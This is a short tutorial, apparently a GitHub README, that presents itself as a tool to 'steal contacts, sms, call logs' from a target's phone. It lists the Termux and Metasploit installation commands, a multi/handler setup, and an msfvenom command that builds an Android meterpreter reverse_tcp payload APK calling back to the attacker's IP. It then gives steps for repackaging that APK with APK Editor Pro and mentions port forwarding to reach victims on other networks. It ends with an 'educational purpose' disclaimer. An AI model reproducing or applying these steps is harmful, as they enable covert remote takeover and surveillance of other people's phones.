This tool will help you to steal contacts, sms, call logs and other thing of Target Mobile.
Twitter - Instagram - Tej's Page
termux-setup-storage
pkg update && pkg upgrade -y
apt-get install curl
apt-get install wget
apt-get install git
apt install ruby
apt install pg_ctl
git clone https://github.com/loathsomeguy/Termux-Metasploit
cd Termux-Metasploit
bash setup
and press y when ask to press
run msfconsole
msfconsole
db_status
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.29.29 (your local ip)
set lport 6767
exploit
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.29.29 LPORT=6767 R > /sdcard/payload.apk
LHOST: your local ip of wifi/mobile network
LPORT: you can use any port
1. Install apk editor pro in your mobile
2. Open Apk Editor Pro and "select an apk fiel and choose your payload"
3. Click "FULL EDIT (Resource Re-Build)"
4. Select Manifest in bottom right corner
5. Now Search for SDK and change target sdk version to 22
6. Now save and again save to rebuild the apk
7. Go to APK Editor Pro folder and install that File
- It is used to retrieve all the messages, contacts, call-logs from the Target Mobile on the same or different Network. However you need to learn how to do port-forwarding in order to do it on different network.
- Use help command to know all the commands
This tool is only for educational purpose. If you use this tool for other purposes except education we will not be responsible in such cases.